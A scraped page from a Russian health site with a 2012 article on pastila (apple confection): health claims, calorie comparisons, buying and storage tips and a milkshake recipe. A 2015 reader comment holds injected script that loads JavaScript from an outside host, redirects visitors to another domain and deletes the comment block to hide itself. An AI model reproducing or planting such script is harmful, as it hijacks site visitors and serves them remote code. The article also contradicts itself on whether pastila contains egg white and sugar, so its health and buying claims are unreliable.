Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Яблочная сладость. Пастил...  >>  Яблочная сладость. Пастила
 
Обратная связь
 

Яблочная сладость. Пастила

Размер шрифта
12 января 2012 03:00
  • google_analytics: false
  • Нравится

Все ли сладости вредные? Говорим о полезных свойствах пастилы и готовим из нее коктейль.

/

Пастила – исконно русское лакомство, которое изготавливали из взбитого пюре кислых антоновских яблок, с добавлением яичного белка. В 19 веке французы модернизировали русскую пастилу – добавили в яблочное пюре чуть больше яичного белка (загустителя), и получился зефир.

Полезные свойства пастилы:

  1. Пектины – выводят из организма соли тяжелых металлов, нормализуют содержание в крови холестерина и сахара, борются с вирусами, препятствуют возникновению язв желудка.

  2. Углеводы – источник энергии для всех клеток и тканей организма.

Пьедестал почета по количеству калорий:

1. Пастила – 323 ккал

2. Мармелад – 306 ккал

3. Зефир – 300 ккал

Как выбрать

  • Пастила должна быть желтоватого цвета.
  • В составе пастилы должно быть минимум красителей и ароматизаторов, а сахара, агара (загустителя), пудры, белка – не должно быть вовсе.
  • В пастиле не должно быть красителей, таких как кармуазин, это канцероген и аллерген. Поэтому лучше выбирать белую или желтоватую пастилу, от красной и розовой лучше отказаться.
  • Пастила очень чувствительна к влаге, поэтому должна быть в герметичной упаковке.
  • Свежая пастила упругая, при надавливании не трескается.
  • Если пастила липкая – она хранилась неправильно, на нее попадал солнечный свет.

Как хранить

  • 1,5 месяца в прохладном, темном и сухом месте в герметичном контейнере.
  • Не хранить пастилу в целлофановом пакете. В нем пастила испортится и станет липкой.
  • Пастилу можно заморозить. В морозилке она сохранит все полезные свойства.

Как готовить

Рецепт молочного коктейля с пастилой:

1. В блендере смешать мороженое, молоко, ванилин и пастилу.
2. Украсить клубникой.


Сюжеты по теме:

Пастила. Десерт для сладкоежек

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Продукты-наркотики. Еда, которая вызывает зависимость   Сердечная диета   Самые популярные мифы о диабете   Вы неправильно едите фрукты  
24 августа 2011Диета снижает холестерин 09 апреля 2013Знаете ли вы ваш уровень сахара
 
15 марта 2013Молоко может привести к развитию анемии 06 февраля 2013Технология разведения коров позволяет определить риск развития рака
 

Слайдшоу

1
Убийцы в вашем холодильнике. Часть 2
Как сделать обычный кофе ИДЕАЛЬНЫМ?
Как научить ребенка есть правильно. Решение всех проблем

Тесты

1
Что вы знаете о холестерине?
Есть ли у вас скрытый риск диабета?
Есть ли у вас остеопороз?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.